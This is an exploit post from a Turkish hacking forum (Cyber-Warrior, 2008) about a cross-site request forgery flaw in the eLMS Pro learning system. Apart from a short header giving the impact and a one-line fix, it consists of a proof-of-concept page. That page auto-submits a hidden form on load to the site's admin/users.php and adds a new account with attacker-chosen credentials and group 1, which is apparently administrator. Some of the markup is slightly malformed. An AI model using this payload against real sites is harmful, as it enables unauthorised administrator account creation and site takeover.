eLMS Pro ~ XSRF Vuln. | Cyber-Warrior Information Technology's World

Root > Exploits / Vulnerabilities > eLMS Pro ~ XSRF Vuln.

Madde
	Author : Bug Researchers/n0x
	Date : 21.12.2008 01:31:44
	# eLMS Pro ~ XSRF Vuln. [Full Screen Display]

	< ------------------- header data start ------------------- > ############################################################# # Application Name : eLMS Pro # Vulnerable Type : XSRF # Infection : Uzaktan otomatik olarak admin pass change edilebilir. # Bug Fix Advice : Form’a Oturum Key’i (Session Token) eklenmeli, eski sifre sorulmalidir. # author : Bug Researchers/n0x ############################################################# < ------------------- header data end of ------------------- > < -- bug code start -- > <b0dy onLoad=Submit();> <script>function Submit[]{document.n0x.submit();}</script> <FORM action=http://www.Site.com/PATCH/admin/users.php method=POST name=n0x > <INPUT type=hidden name=save value=1> <INPUT type=hidden name=action value=add_new_user> <INPUT type=hidden name=firstname maxlength=100 value=add> <INPUT type=hidden name=lastname maxlength=100 value=add> <INPUT type=hidden name=email maxlength=150 value=n0x@Cyber-warrior.org> <INPUT type=hidden name=login maxlength=50 value=addadd> <INPUT type=hidden name=password maxlength=20 value=addadd> <INPUT type=hidden name=re_password maxlength=20 value=addadd> <select name=group_id style=width: 155px;><OPTION value=1 ></OPTION> <input type=submit value=create name=B1> < -- bug code end of -- >